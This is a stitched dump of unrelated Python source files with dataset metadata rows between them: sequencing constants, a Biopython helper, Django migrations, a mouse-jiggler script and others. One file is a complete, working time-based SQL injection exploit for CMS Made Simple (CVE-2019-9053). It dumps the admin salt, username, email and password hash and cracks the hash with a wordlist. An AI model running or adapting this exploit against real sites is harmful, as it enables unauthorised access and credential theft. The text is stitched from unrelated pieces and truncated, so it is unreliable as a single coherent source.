ILLUMINA_MISEQ = "Illumina MiSeq"
ILLUMINA_MINISEQ = "Illumina MiniSeq"
ILLUMINA_NOVASEQ_6000 = "Illumina NovaSeq 6000"
ILLUMINA_NETSEQ_500 = "NextSeq 500"
ILLUMINA_NETSEQ_550 = "NextSeq 550"
PACBIO_RS = "PacBio RS"
PACBIO_RS2 = "PacBio RS II"
PACBIO_SEQEL = "Sequel"
IONTORRENT_PGM = "Ion Torrent PGM"
IONTORRENT_PROTON = "Ion Torrent Proton"
IONTORRENT_S5 = "Ion Torrent S5"
IONTORRENT_S5XL = "Ion Torrent S5 XL"
ABI_AB3730XL = "AB 3730xL Genetic Analyzer"
ABI_AB3730 = "AB 3730 Genetic Analyzer"
ABI_AB3500XL = "AB 3500xL Genetic Analyzer"
ABI_AB3500 = "AB 3500 Genetic Analyzer"
ABI_AB3130XL = "AB 3130xL Genetic Analyzer"
ABI_AB3130 = "AB 3130 Genetic Analyzer"
ABI_AB310 = "AB 310 Genetic Analyzer"
ONT_MINION = "MinION"
ONT_GRIDION = "GridION"
ONT_PROMETHION = "PromethION"
BGI_BGISEQ500 = "BGISEQ-500"
DNB_T7 = "DNBSEQ-T7"
DNB_G400 = "DNBSEQ-G400"
DNB_G50 = "DNBSEQ-G50"
DNB_G400_FAST = "DNBSEQ-G400 FAST"
UNSPECIFIED = "unspecified"
#: Allowed values for instruments in ENA records.
INSTRUMENTS = (
LS454_454GS,
LS454_454GS_240,
LS454_454GS_FLX,
LS454_454GS_FLX_PLUS,
LS454_454GS_FLX_TITANIUM,
LS454_454GS_JUNIOR,
ILLUMINA_HISEQX_FIVE,
ILLUMINA_HISEQX_TEN,
ILLUMINA_GA,
ILLUMINA_GA2,
ILLUMINA_GA2x,
ILLUMINA_HISCANQ,
ILLUMINA_HISEQ_1000,
ILLUMINA_HISEQ_1500,
ILLUMINA_HISEQ_2000,
ILLUMINA_HISEQ_2500,
ILLUMINA_HISEQ_3000,
ILLUMINA_HISEQ_4000,
ILLUMINA_ISEQ_100,
ILLUMINA_MISEQ,
ILLUMINA_MINISEQ,
ILLUMINA_NOVASEQ_6000,
ILLUMINA_NETSEQ_500,
ILLUMINA_NETSEQ_550,
PACBIO_RS,
PACBIO_RS2,
PACBIO_SEQEL,
IONTORRENT_PGM,
IONTORRENT_PROTON,
IONTORRENT_S5,
IONTORRENT_S5XL,
ABI_AB3730XL,
ABI_AB3730,
ABI_AB3500XL,
ABI_AB3500,
ABI_AB3130XL,
ABI_AB3130,
ABI_AB310,
ONT_MINION,
ONT_GRIDION,
ONT_PROMETHION,
BGI_BGISEQ500,
DNB_T7,
DNB_G400,
DNB_G50,
DNB_G400_FAST,
UNSPECIFIED,
)
# Constants for library selection.
LIBSEL_RANDOM = "RANDOM"
LIBSEL_PCR = "PCR"
LIBSEL_RANDOM_PCR = "RANDOM PCR"
LIBSEL_RT_PCR = "RT-PCR"
LIBSEL_HMPR = "HMPR"
LIBSEL_MF = "MF"
LIBSEL_REPEAT_FRACTIONATION = "repeat fractionation"
LIBSEL_SIZE_FRACTIONATION = "size fractionation"
LIBSEL_MSLL = "MSLL"
LIBSEL_CDNA = "cDNA"
LIBSEL_CDNA_RANDOM_PRIMING = "cDNA_randomPriming"
LIBSEL_CDNA_OLIGO_DT = "cDNA_oligo_dT"
LIBSEL_POLYA = "PolyA"
LIBSEL_OLIGO_DT = "Oligo-dT"
LIBSEL_INVERSE_RNA = "Inverse rRNA"
LIBSEL_INVERSE_RNA_SELECTION = "Inverse rRNA selection"
LIBSEL_CHIP = "ChIP"
LIBSEL_CHIP_SEQ = "ChIP-Seq"
LIBSEL_MNASE = "MNase"
LIBSEL_DNASE = "DNase"
LIBSEL_HYBRID_SELECTION = "Hybrid Selection"
LIBSEL_REDUCED_REPRESENTATION = "Reduced Representation"
LIBSEL_RESTRICTION_DIGEST = "Restriction Digest"
LIBSEL_5HETYHLCYTITINE_ANTIBODY = "5-methylcytidine antibody"
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN = "MBD2 protein methyl-CpG binding domain"
LIBSEL_CAGE = "CAGE"
LIBSEL_RACE = "RACE"
LIBSEL_MDA = "MDA"
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD = "padlock probes capture method"
LIBSEL_OTHER = "other"
LIBSEL_UNSPECIFIED = "unspecified"
#: Allowed library selection strategies for ENA records.
LIBRARY_SELECTIONS = (
LIBSEL_RANDOM,
LIBSEL_PCR,
LIBSEL_RANDOM_PCR,
LIBSEL_RT_PCR,
LIBSEL_HMPR,
LIBSEL_MF,
LIBSEL_REPEAT_FRACTIONATION,
LIBSEL_SIZE_FRACTIONATION,
LIBSEL_MSLL,
LIBSEL_CDNA,
LIBSEL_CDNA_RANDOM_PRIMING,
LIBSEL_CDNA_OLIGO_DT,
LIBSEL_POLYA,
LIBSEL_OLIGO_DT,
LIBSEL_INVERSE_RNA,
LIBSEL_INVERSE_RNA_SELECTION,
LIBSEL_CHIP,
LIBSEL_CHIP_SEQ,
LIBSEL_MNASE,
LIBSEL_DNASE,
LIBSEL_HYBRID_SELECTION,
LIBSEL_REDUCED_REPRESENTATION,
LIBSEL_RESTRICTION_DIGEST,
LIBSEL_5HETYHLCYTITINE_ANTIBODY,
LIBSEL_MBD2_PROTEIN_METHYL_CPG_BINDING_DOMAIN,
LIBSEL_CAGE,
LIBSEL_RACE,
LIBSEL_MDA,
LIBSEL_PADLOCK_PROBES_CPATURE_METHOD,
LIBSEL_OTHER,
LIBSEL_UNSPECIFIED,
)
# Constants for library sources.
LIBSRC_GENOMIC = "GENOMIC"
LIBSRC_GENOMIC_SC = "GENOMIC SINGLE CELL"
LIBSRC_TRANSCRIPTOMIC = "TRANSCRIPTOMIC"
LIBSRC_TRANSCRIPTOMIC_SC = "TRANSCRIPTOMIC SINGLE CELL"
LIBSRC_METAGENOMIC = "METAGENOMIC"
LIBSRC_METATRANSCRIPTOMIC = "METATRANSCRIPTOMIC"
LIBSRC_SYNTHETIC = "SYNTHETIC"
LIBSRC_VIRAL_RNA = "VIRAL RNA"
LIBSRC_OTHER = "OTHER"
#: Allowed library sources for ENA records.
LIBRARY_SOURCES = (
LIBSRC_GENOMIC,
LIBSRC_GENOMIC_SC,
LIBSRC_TRANSCRIPTOMIC,
LIBSRC_TRANSCRIPTOMIC_SC,
LIBSRC_METAGENOMIC,
LIBSRC_METATRANSCRIPTOMIC,
LIBSRC_SYNTHETIC,
LIBSRC_VIRAL_RNA,
LIBSRC_OTHER,
)
# Constants for library strategies.
LIBSTR_WGS = "WGS"
LIBSTR_WGA = "WGA"
LIBSTR_WXS = "WXS"
LIBSTR_RNA_SEQ = "RNA-Seq"
LIBSTR_SSRNA_SEQ = "ssRNA-seq"
LIBSTR_MIRNA_SEQ = "miRNA-Seq"
LIBSTR_NCRNA_SEQ = "ncRNA-Seq"
LIBSTR_FL_CDNA = "FL-cDNA"
LIBSTR_EST = "EST"
LIBSTR_HIC = "Hi-C"
LIBSTR_ATAC_SEQ = "ATAC-seq"
LIBSTR_WCS = "WCS"
LIBSTR_RAD_SEQ = "RAD-Seq"
LIBSTR_CLONE = "CLONE"
LIBSTR_POOLCLONE = "POOLCLONE"
LIBSTR_AMPLICON = "AMPLICON"
LIBSTR_CLONEEND = "CLONEEND"
LIBSTR_FINISHING = "FINISHING"
LIBSTR_CHIP_SEQ = "ChIP-Seq"
LIBSTR_MNASE_EQ = "MNase-Seq"
LIBSTR_DNASE_HYPERSENSITIVITY = "DNase-Hypersensitivity"
LIBSTR_BISULFITE_SEQ = "Bisulfite-Seq"
LIBSTR_CTS = "CTS"
LIBSTR_MRE_SEQ = "MRE-Seq"
LIBSTR_MEDIP_SEQ = "MeDIP-Seq"
LIBSTR_MBD_SEQ = "MBD-Seq"
LIBSTR_TN_SEQ = "Tn-Seq"
LIBSTR_VALIDATION = "VALIDATION"
LIBSTR_FAIRE_SEQ = "FAIRE-seq"
LIBSTR_SELEX = "SELEX"
LIBSTR_RIP_SEQ = "RIP-Seq"
LIBSTR_CHIA_PET = "ChIA-PET"
LIBSTR_SYNTHEETIC_LONG_READ = "Synthetic-Long-Read"
LIBSTR_TARGETED_CAPTURE = "Targeted-Capture"
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE = "Tethered Chromatin Conformation Capture"
LIBSTR_OTHER = "OTHER"
#: Allowed library strategies for ENA records.
LIBRARY_STRATEGIES = (
LIBSTR_WGS,
LIBSTR_WGA,
LIBSTR_WXS,
LIBSTR_RNA_SEQ,
LIBSTR_SSRNA_SEQ,
LIBSTR_MIRNA_SEQ,
LIBSTR_NCRNA_SEQ,
LIBSTR_FL_CDNA,
LIBSTR_EST,
LIBSTR_HIC,
LIBSTR_ATAC_SEQ,
LIBSTR_WCS,
LIBSTR_RAD_SEQ,
LIBSTR_CLONE,
LIBSTR_POOLCLONE,
LIBSTR_AMPLICON,
LIBSTR_CLONEEND,
LIBSTR_FINISHING,
LIBSTR_CHIP_SEQ,
LIBSTR_MNASE_EQ,
LIBSTR_DNASE_HYPERSENSITIVITY,
LIBSTR_BISULFITE_SEQ,
LIBSTR_CTS,
LIBSTR_MRE_SEQ,
LIBSTR_MEDIP_SEQ,
LIBSTR_MBD_SEQ,
LIBSTR_TN_SEQ,
LIBSTR_VALIDATION,
LIBSTR_FAIRE_SEQ,
LIBSTR_SELEX,
LIBSTR_RIP_SEQ,
LIBSTR_CHIA_PET,
LIBSTR_SYNTHEETIC_LONG_READ,
LIBSTR_TARGETED_CAPTURE,
LIBSTR_TETHERED_CHROMATIN_CONFORMATION_CAPTURE,
LIBSTR_OTHER,
)
| 27.59661 | 91 | 0.737624 |
49c885495b8b9d85f2a2df00b05e024d355e6e0a | 1,463 | py | Python | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 10 | 2015-01-25T20:29:55.000Z | 2020-12-08T21:35:09.000Z | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 3 | 2018-05-15T06:28:20.000Z | 2021-03-30T17:47:45.000Z | analytics/utils.py | educreations/py-analytics | abbc814925c6cc200b3329c7de9f1868e1cb8c01 | [
"Apache-2.0"
] | 6 | 2017-07-03T16:28:29.000Z | 2020-06-15T19:10:45.000Z | """
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
Version 2.0 (the "License"); you may not use this file
except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
# import_string comes form Werkzeug
# http://werkzeug.pocoo.org
def import_string(import_name, silent=False):
"""Imports an object based on a string. If *silent* is True the return
value will be None if the import fails.
Simplified version of the function with same name from `Werkzeug`_.
:param import_name:
The dotted name for the object to import.
:param silent:
If True, import errors are ignored and None is returned instead.
:returns:
The imported object.
"""
import_name = str(import_name)
try:
if '.' in import_name:
module, obj = import_name.rsplit('.', 1)
return getattr(__import__(module, None, None, [obj]), obj)
else:
return __import__(import_name)
except (ImportError, AttributeError):
if not silent:
raise
| 32.511111 | 74 | 0.699932 |
49c8b96abc3f198aa66587406ab8b7e9c78fd259 | 31 | py | Python | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | [
"MIT"
] | 10 | 2019-03-17T19:37:25.000Z | 2022-01-02T04:29:05.000Z | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | [
"MIT"
] | 1 | 2019-09-25T09:32:49.000Z | 2021-12-28T05:05:55.000Z | lemkelcp/__init__.py | pritam-dey3/lemkelcp | 4d963a6d0e6ba531496f5b0e99a52c0d288e4a6e | [
"MIT"
] | 4 | 2019-02-24T11:49:10.000Z | 2020-06-06T14:07:11.000Z | from .lemkelcp import lemkelcp
| 15.5 | 30 | 0.83871 |
49c93ee339debd703889e1a8187ecdfd356689ca | 1,999 | py | Python | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | [
"BSD-3-Clause"
] | 117 | 2019-03-19T08:47:03.000Z | 2022-03-31T04:14:51.000Z | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | [
"BSD-3-Clause"
] | 10 | 2019-09-15T14:59:43.000Z | 2022-03-15T14:18:02.000Z | settings.py | ArneBinder/Pytorch-LRP | c17902138f1d560f1f5d38f401ac856e071a5800 | [
"BSD-3-Clause"
] | 49 | 2019-03-19T08:47:03.000Z | 2021-11-30T01:02:04.000Z | """
Settings for re-running the experiments from the paper "Layer-wise
relevance propagation for explaining deep neural network decisions
in MRI-based Alzheimers disease classification".
Please note that you need to download the ADNI data from
http://adni.loni.usc.edu/ and preprocess it using
https://github.com/ANTsX/ANTs/blob/master/Scripts/antsRegistrationSyNQuick.sh
Please prepare the data, such that you will get three HDF5 files,
consisting of a training, a validation and a holdout (test) set.
Each HDF5 file is required to have 2 datasets, namely X and y,
containing the data matrix and label vector accordingly. We have
included the "Data Split ADNI.ipynb" file as a guideline for data splitting.
Please note that it is highly dependent on the format of your data storage
and needs to be individualized as such.
Furthermore you will need SPM12 https://www.fil.ion.ucl.ac.uk/spm/software/spm12/
in order to access the Neuromorphometrics atlas.
Arguments:
model_path: Path to the trained pytorch model parameters
data_path: Path where the outputs will be stored and retrieved
ADNI_DIR: Path to the root of your downloaded ADNI data
train_h5: Path to the training set HDF5 file
val_h5: Path to the validation set HDF5 file
holdout_h5: Path to the holdout set HDF5 file
binary_brain_mask: Path to the mask used for masking the images,
included in the repository.
nmm_mask_path: Path to the Neuromorphometrics mask. Needs to be
acquired from SPM12. Typically located under
~/spm12/tpm/labels_Neuromorphometrics.nii
nmm_mask_path_scaled: Path to the rescaled Neuromorphometrics mask.
"""
settings = {
"model_path": INSERT,
"data_path": INSERT,
"ADNI_DIR": INSERT,
"train_h5": INSERT,
"val_h5": INSERT,
"holdout_h5": INSERT,
"binary_brain_mask": "binary_brain_mask.nii.gz",
"nmm_mask_path": "~/spm12/tpm/labels_Neuromorphometrics.nii",
"nmm_mask_path_scaled": "nmm_mask_rescaled.nii"
}
| 40.795918 | 81 | 0.758379 |
49ca8eabe12b4dbe3823135f9cccd4003e5ec8f9 | 274 | py | Python | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | [
"MIT"
] | null | null | null | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | [
"MIT"
] | null | null | null | compiler_test.py | zpcore/ACOW | 9d9186eb28af3e5e1242621457f36d5a7910366a | [
"MIT"
] | null | null | null | '''
# Test the compiler
'''
from ACOW import *
data = '''
a1 U[1,2] !a0&G[1,3]a3
'''
print('MTL Formula:',data)
# Test lex
print('\nLex Test:')
lexer.input(data)
for tok in lexer:
print(tok)
# Test parser
print('\nParser Test:')
result = parser.parse(data)
print(result) | 13.7 | 27 | 0.645985 |
49caba94d9ddd16a821b2ba8d9ea2e815b9e25e0 | 1,292 | py | Python | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | [
"OML"
] | null | null | null | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | [
"OML"
] | null | null | null | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | [
"OML"
] | null | null | null | import board
import time
import random
import usb_hid
from adafruit_hid.mouse import Mouse
from adafruit_hid.keyboard import Keyboard
mouse = Mouse(usb_hid.devices)
goright=True
while True:
#2 parts to sequence, move mostly right, then mostly left
# set up for big move
#longwait=random.randint(250,350)
longwait=random.randint(2,3)
bigoffsetx=random.randint(-10,10)
bigoffsety=random.randint(-7,7)
# do 1st big move
if goright:
# do a right move
print("moving right")
mouse.move(100+bigoffsetx,bigoffsety)
goright=False
else:
# do a left move
print("moving left")
mouse.move(-100+bigoffsetx,bigoffsety)
goright=True
# do some quick clicks and moves
numberofclicks=random.randint(3,6)
print("doing some clicks")
for ismall in range(1,numberofclicks):
#shortwait in ms (double click is usually less than 500ms)
shortwait=0.001*random.randint(250,600)
#print(shortwait)
shortmovex=random.randint(-9,9)
shortmovey=random.randint(-7,7)
#move, wait, click
mouse.move(shortmovex,shortmovey)
time.sleep(shortwait)
mouse.click(Mouse.LEFT_BUTTON)
time.sleep(longwait)
print("waiting for next move")
| 25.84 | 66 | 0.666409 |
49cc558662f5dd7e7fb056fd6f79d57effb78d66 | 315 | py | Python | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | [
"MIT"
] | null | null | null | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | [
"MIT"
] | 3 | 2021-03-30T13:54:34.000Z | 2021-09-08T02:17:46.000Z | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post, Comment, UserProfile
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(UserProfile, admin_class=ProfileAdmin)
| 26.25 | 58 | 0.796825 |
49cd3c2fd0bbd8a92289c21bd54ca7e440919719 | 25,042 | py | Python | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | [
"BSD-3-Clause"
] | null | null | null | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | [
"BSD-3-Clause"
] | null | null | null | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-27 14:43
from __future__ import unicode_literals
import ckeditor.fields
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
import jagdreisencheck.custom_fields
| 83.473333 | 349 | 0.633376 |
49ce339e404139f63103f0e97e83fc72d1aded23 | 15,097 | py | Python | bio2.py | phenolophthaleinum/BioPython | 67be63e69f136134ca8cb41676700c97da7a2006 | [
"MIT"
] | null | null | null | bio2.py | phenolophthaleinum/BioPython | 67be63e69f136134ca8cb41676700c97da7a2006 | [
"MIT"
] | null | null | null | bio2.py | phenolophthaleinum/BioPython | 67be63e69f136134ca8cb41676700c97da7a2006 | [
"MIT"
] | null | null | null | from Bio.SeqIO import parse
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
from Bio.Alphabet import IUPAC, generic_dna
from Bio import Alphabet, Entrez
from Bio.SeqUtils import GC
from Bio.Blast import NCBIWWW, NCBIXML
from Bio import pairwise2
from Bio.pairwise2 import format_alignment
from Bio import motifs
__author__ = 'Maciej Michalczyk'
__version__ = '09122019'
# def convertFASTAtoGENBANK(self, filename):
# file = open(filename + ".fasta")
# record = SeqIO.read(file, "fasta")
# record.seq.alphabet = generic_dna
# file_genbank = open(filename + ".gbk", "w")
# SeqIO.write(record, file_genbank, "genbank")
# file_genbank.close()
# file.close()
if __name__ == '__main__':
session = CurrentSession()
while True:
print("""////Bio Python////
1. Load FASTA file
2. Load record info
3. Get complementary sequence
4. Transcribe sequence
5. Translate sequence
6. Get GC content
7. Fetch and load FASTA from Entrez
*8. Convert FASTA to GenBank
9. Run BLAST
10. Perform pairwise aligment
11. Create motifs and weblogo
12. Save your actions made on FASTA file to txt file
13. Print sequence substrings
=== Current session file: {} ===
Type 'help' for help.
Type 'quit' to exit.""".format(session.file_session))
menu_pos = input('>>').lower()
if menu_pos == str(1):
try:
print("Type name of FASTA file to process: ")
filename = input()
file_handle = session.openFile(filename)
print("FASTA loaded!")
except Exception as e:
print("No such file or directory.")
elif menu_pos == str(2):
try:
file_handle = session.openFile(filename)
session.getSequenceInfo(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(3):
try:
file_handle = session.openFile(filename)
session.getComplementarySequence(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(4):
try:
file_handle = session.openFile(filename)
session.transcribeSequence(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(5):
stop = input('Stop translating at first stop codon? [y/n]').lower()
try:
file_handle = session.openFile(filename)
session.translateSequence(file_handle, stop)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(6):
try:
file_handle = session.openFile(filename)
session.get_GC_Content(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(7):
try:
db = input("Type database name: ").lower()
accession = input("Type accession to find: ")
filename = session.fetchRecord(db, accession)
file_handle = session.openFile(filename)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(8):
try:
print("Type name of FASTA file to process: ")
filename = input()
# session.convertFASTAtoGENBANK(filename)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(9):
try:
file_handle = session.openFile(filename)
type = input("Type the type of BLAST: ")
database = input("Type database name: ")
session.runBlast(type, database)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(10):
try:
print("""Choose type of aligment:
1. Global Pairwise (default parameters)
2. Local Pairwise (default parameters)
3. Global Pairwise with custom parameters""")
alignment_type = input('>>')
file_handle = session.openFile(filename)
session.alignPairwise(file_handle, alignment_type)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(11):
try:
file_handle = session.openFile(filename)
session.createMotif(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded")
elif menu_pos == str(12):
session.saveActions()
elif menu_pos == str(13):
try:
length = int(input("Length of substrings:"))
iterator = session.getElems(length)
print(session.sequence)
i = 0
for base in iterator:
print(' ' * i + base)
i += 1
print(' ' * i + next(iterator))
i += 1
except StopIteration:
pass
except Exception as e:
print("File is not loaded")
elif menu_pos == 'debug':
print("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(session.id, session.name,
session.desc,session.sequence,
session.comp_seq, session.transcribed_seq,
session.translated_seq, session.gc_perc))
elif menu_pos == 'quit':
break
elif menu_pos == 'help':
print("""
quickHELP:
Indent operations in menu needs file to be opened first.
Be patient while doing BLAST.
If in menu something is marked with an asterisk, then it is not usable.
Have fun!
""")
else:
print("Unknown command.")
| 39.111399 | 110 | 0.540703 |
49cfbdd139a2858864f15766804aa976f1344306 | 6,456 | py | Python | room/easyctf/exploit/46635.py | danieldavidson/tryhackme-ctf | f42362609ffb72151f7056371e6ad7207e42c8c5 | [
"MIT"
] | null | null | null | room/easyctf/exploit/46635.py | danieldavidson/tryhackme-ctf | f42362609ffb72151f7056371e6ad7207e42c8c5 | [
"MIT"
] | null | null | null | room/easyctf/exploit/46635.py | danieldavidson/tryhackme-ctf | f42362609ffb72151f7056371e6ad7207e42c8c5 | [
"MIT"
] | 1 | 2022-03-11T22:55:33.000Z | 2022-03-11T22:55:33.000Z | #!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print "[+] Specify an url target"
print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print colored("[*] Now try to crack password")
crack_password()
beautify_print() | 34.709677 | 189 | 0.586431 |
49d510eb8a62e95ceab2defdd45b0de37d252639 | 968 | py | Python | module3-nosql-and-document-oriented-databases/rpg_mongo.py | Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases | f78bb4c67a182dd3c96ffdca1175d888239f2099 | [
"MIT"
] | null | null | null | module3-nosql-and-document-oriented-databases/rpg_mongo.py | Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases | f78bb4c67a182dd3c96ffdca1175d888239f2099 | [
"MIT"
] | null | null | null | module3-nosql-and-document-oriented-databases/rpg_mongo.py | Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases | f78bb4c67a182dd3c96ffdca1175d888239f2099 | [
"MIT"
] | null | null | null | import pymongo
client = pymongo.MongoClient('''mongodb://dakotapope:passwrd@
cluster0-shard-00-00-iaoct.mongodb.net:27017,cluster0-shard-00
-01-iaoct.mongodb.net:27017,cluster0-shard-00-02-iaoct.mongodb.
net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=
admin&retryWrites=true''')
# investigate the databases already initialized
client.database_names()
# -->['rpg_data', 'test', 'admin', 'local']
# since I created the table on the Mongo Atlas dashboard I wil use it here
rpgs = client.rpg_data.rpg
# loadout the json file to prep for dumping into a mongo db table
with open('''C:/Users/dakot/Documents/GitHub/DS-Unit-3-Sprint-2-SQL-and-
Databases/module3-nosql-and-document-oriented-databases/rpg.json''') as f:
file_data = json.load(f)
# make a space for the data to go
rpg_table = rpg['rpg_data']
# Dump the json data into the mongodb cloud.
rpg_table.insert_many(file_data)
# <pymongo.results.InsertManyResult at 0x2c80a7c8688>
# And DONE!
| 34.571429 | 74 | 0.764463 |
49d5165d59fc22ca8bcab148e06413fa005d535e | 2,799 | py | Python | convertPP.py | Harry93x/FinancialToolbox | d34ef96d66b7447332d8f977da8fa9abc43cc981 | [
"MIT"
] | null | null | null | convertPP.py | Harry93x/FinancialToolbox | d34ef96d66b7447332d8f977da8fa9abc43cc981 | [
"MIT"
] | null | null | null | convertPP.py | Harry93x/FinancialToolbox | d34ef96d66b7447332d8f977da8fa9abc43cc981 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import xlrd
import csv
import sys
import getopt
# input configuration
iColDate = 0
iColTransactionType = 1
iColAmount = 3
iColDescription = 6
transactionType = 'Repayment'
descriptionType = 'Interest'
#output configuration
outHeader = ['Datum', 'Typ', 'Wert']
outType = 'Zinsen'
outDelimiter = ';'
if __name__ == "__main__":
main(sys.argv[1:])
| 29.15625 | 198 | 0.649875 |
49d5fecaf1e79a501de0719400a144c921ff2ac0 | 1,096 | py | Python | lib/python3.7/site-packages/vine/__init__.py | nguyentranhoan/uit-mobile | 8546312b01373d94cf00c64f7eacb769e0f4ccce | [
"BSD-3-Clause"
] | 13 | 2018-03-28T23:07:01.000Z | 2022-03-12T06:01:21.000Z | newenv/lib/python3.8/site-packages/vine/__init__.py | palakshivlani-11/cryptorium | eebb78c061007519e527b3d18b8df6bc13679c46 | [
"Apache-2.0"
] | 13 | 2020-03-24T17:53:51.000Z | 2022-02-10T20:01:14.000Z | newenv/lib/python3.8/site-packages/vine/__init__.py | palakshivlani-11/cryptorium | eebb78c061007519e527b3d18b8df6bc13679c46 | [
"Apache-2.0"
] | 5 | 2018-03-28T23:07:05.000Z | 2021-12-09T19:02:00.000Z | """Promises, promises, promises."""
from __future__ import absolute_import, unicode_literals
import re
from collections import namedtuple
from .abstract import Thenable
from .promises import promise
from .synchronization import barrier
from .funtools import (
maybe_promise, ensure_promise,
ppartial, preplace, starpromise, transform, wrap,
)
__version__ = '1.3.0'
__author__ = 'Ask Solem'
__contact__ = 'ask@celeryproject.org'
__homepage__ = 'http://github.com/celery/vine'
__docformat__ = 'restructuredtext'
# -eof meta-
version_info_t = namedtuple('version_info_t', (
'major', 'minor', 'micro', 'releaselevel', 'serial',
))
# bump version can only search for {current_version}
# so we have to parse the version here.
_temp = re.match(
r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups()
VERSION = version_info = version_info_t(
int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '')
del(_temp)
del(re)
__all__ = [
'Thenable', 'promise', 'barrier',
'maybe_promise', 'ensure_promise',
'ppartial', 'preplace', 'starpromise', 'transform', 'wrap',
]
| 26.095238 | 68 | 0.699818 |
49d6bd8f68e9b38cfe513863c74dbe676a8959d2 | 1,965 | py | Python | Ben_Manuscripts/transport/figures/hops_dwells.py | shirtsgroup/LLC_Membranes | e94694f298909352d7e9d912625314a1e46aa5b6 | [
"MIT"
] | 4 | 2019-06-18T15:26:49.000Z | 2021-08-11T18:57:39.000Z | Ben_Manuscripts/transport/figures/hops_dwells.py | shirtsgroup/LLC_Membranes | e94694f298909352d7e9d912625314a1e46aa5b6 | [
"MIT"
